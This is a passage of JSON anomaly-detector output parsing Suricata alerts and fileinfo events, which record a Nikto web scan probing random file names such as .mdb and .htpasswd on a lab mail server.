192.168.10.238:46912 -> 192.168.10.154:80", "/parser/model/time": 1583349514.31217, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46912, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.312371, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": 
"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46912, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1737271305486500, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" 
], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80", "/parser/model/time": 1583349514.314733, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46914, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ 
"\\/bISn4adA.htpasswd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.31494, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":220086993078258,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": 
"\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46914, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":220086993078258,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 220086993078258, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) 
detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80", "/parser/model/time": 1583349514.316707, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46916, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.signature", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.316954, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46916, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1437349444244092, "/parser/model/flow_id/flow_id/comma_str": 